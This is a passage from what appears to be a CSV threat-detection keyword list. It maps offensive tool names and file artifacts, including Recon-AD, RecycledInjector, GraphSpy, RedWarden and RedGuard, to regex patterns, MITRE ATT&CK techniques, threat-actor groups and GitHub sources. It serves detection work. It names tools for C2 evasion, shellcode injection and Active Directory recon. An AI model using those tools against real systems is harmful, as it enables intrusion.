RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56523" "*Recon-AD-*.sln*",".{0,1000}Recon\-AD\-.{0,1000}\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56524" "*Recon-AD-*.vcxproj*",".{0,1000}Recon\-AD\-.{0,1000}\.vcxproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56525" "*Recon-AD-AllLocalGroups*",".{0,1000}Recon\-AD\-AllLocalGroups.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon 
tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56526" "*Recon-AD-Computers All*",".{0,1000}Recon\-AD\-Computers\sAll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56527" 
"*Recon-AD-Domain*",".{0,1000}Recon\-AD\-Domain.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56528" "*Recon-AD-Groups All*",".{0,1000}Recon\-AD\-Groups\sAll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - 
TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56529" "*Recon-AD-LocalGroups*",".{0,1000}Recon\-AD\-LocalGroups.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56530" "*Recon-AD-SPNs*",".{0,1000}Recon\-AD\-SPNs.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool 
based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56531" "*Recon-AD-Users All*",".{0,1000}Recon\-AD\-Users\sAll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56532" 
"*Recon-AD-Users.*",".{0,1000}Recon\-AD\-Users\..{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56533" "*recon-archy analyse*",".{0,1000}recon\-archy\sanalyse.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","56534" "*recon-archy build*",".{0,1000}recon\-archy\sbuild.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","56535" "*recon-archy crawl*",".{0,1000}recon\-archy\scrawl.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","56536" "*recon-archy-master*",".{0,1000}recon\-archy\-master.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","56537" "*ReconUserGroupRoles.ps1*",".{0,1000}ReconUserGroupRoles\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","56538" "*RecycledInjector.exe*",".{0,1000}RecycledInjector\.exe.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","56539" "*RecycledInjector-main*",".{0,1000}RecycledInjector\-main.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","56540" "*RecycledInjector-main*",".{0,1000}RecycledInjector\-main.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","56541" "*RED_HAWK*",".{0,1000}RED_HAWK.{0,1000}","offensive_tool_keyword","red_hawk","Vulnerability Scanning and Crawling. 
A must have tool for all penetration testers.","T1190 - T1059 - T1595","TA0001 - TA0009","N/A","N/A","Reconnaissance","https://github.com/Tuhinshubhra/RED_HAWK","1","0","N/A","N/A","N/A","10","3257","888","2024-07-31T15:33:36Z","2017-06-11T05:02:35Z","56542" "*Red-Baron*",".{0,1000}Red\-Baron.{0,1000}","offensive_tool_keyword","Red-Baron","Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient. disposable. secure and agile infrastructure for Red Teams.","T1583 - T1078 - T1027 - T1135","TA0002 - TA0003 - TA0040","N/A","N/A","Framework","https://github.com/byt3bl33d3r/Red-Baron","1","0","N/A","N/A","N/A","4","378","77","2020-03-05T07:19:43Z","2018-08-23T18:25:07Z","56543" "*RedByte1337/GraphSpy*",".{0,1000}RedByte1337\/GraphSpy.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","1","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","56544" "*redelk_backend_name_c2*",".{0,1000}redelk_backend_name_c2.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","56545" "*redelk_backend_name_decoy*",".{0,1000}redelk_backend_name_decoy.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","56546" "*RedGuard.log*",".{0,1000}RedGuard\.log.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","#logfile","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","56547" "*RedGuard/core*",".{0,1000}RedGuard\/core.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan 
- CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","56548" "*RedGuard_x64.exe*",".{0,1000}RedGuard_x64\.exe.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","56549" "*RedGuard_x86.exe*",".{0,1000}RedGuard_x86\.exe.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
